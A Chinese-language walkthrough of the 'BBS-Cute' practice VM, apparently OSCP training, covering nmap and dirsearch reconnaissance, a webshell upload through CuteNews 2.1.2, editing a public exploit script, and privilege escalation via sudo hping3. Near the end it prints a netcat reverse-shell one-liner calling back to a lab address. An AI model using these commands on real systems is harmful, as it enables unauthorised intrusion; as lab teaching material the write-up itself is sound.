OSCP系列靶机—BBS-Cute

一、主机发现

image-20240725191241484

二、端口扫描

1、快速扫描

image-20240725191321528

2、全端口扫描

image-20240725191602485

3、服务版本探测

1
nmap -sT -sV -sC -O -p 22,80,88,110,995 192.168.56.104

image-20240725191705700

88端口开了一个http服务,但标题确实404未找到,110和995是POP3服务,可能存在一些信息

4、漏洞探测

1
nmap --script=vuln -p 22,80,88,110,995 192.168.56.104

image-20240725192231998

80端口发现了一些目录;诶诶,这个88端口的服务怎么变了,而且开放的还是kerberos服务

三、HTTP信息收集

1、首页及源代码

image-20240725192034199

Apache2的首页,应该拿不到什么信息

2、目录扫描

1
dirsearch -u http://192.168.56.104/ -x 404,403

image-20240725192210604

有很多目录和文件

3、index.php文件

image-20240725193140677

一个登陆点,同时在这里给到了一个版本号:2.1.2;第一时间当然是搜索有无漏洞了

image-20240725193923653

我们对第四个非常感兴趣,尝试执行,没有东西

image-20240725202632179

4、文件上传尝试

image-20240725204919639

这里给了文件上传的POC,但是利用提交是需要一个上传点,那这里需要登陆后台去先;注册用户登陆后台

image-20240725205528454

注册成功,来到后台;在注册中的验证码需要bp抓包查看;之后找文件上传的点

image-20240725205749405

进来之后,可以看到正好有上传的点

image-20240725205822531

按照POC的步骤尝试上传;先写一个webshell,上传抓包后改包

image-20240725204954003

改为php后缀

image-20240725210038266

给了个报错,说头像不合格

image-20240725210108029

应该是有检测机制,我们写入一个真正的图片中去

image-20240725210315667

更改后缀,啊,又有新的情况;是一个csrf 的防御机制,这个我们重新抓包来一遍即可

image-20240725210355998

成功上传

image-20240725210556143

那上传到什么位置了呢?之前看到有个uploads的目录,尝试执行命令

image-20240725210813322

执行失败了,可能是木马有问题,重新尝试;不对,看到文件的上传点居然在另一个域名

image-20240725213434128

四、Getshell

重新返回去看之前命令执行的py 文件,在翻看了源代码之后发现确实存在差错

image-20240725213733685

这里多了CuteNews的路径,需要删除全文的这个路径;大概有五处需要修改,修改之后再次执行

image-20240725214001302

成功获取shell,之后我们反弹过来nc

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.101 4444 >/tmp/f

image-20240725214201428

五、权限提升

1、信息收集

发现可以sudo 的使用hping3,直接提权

image-20240725215626801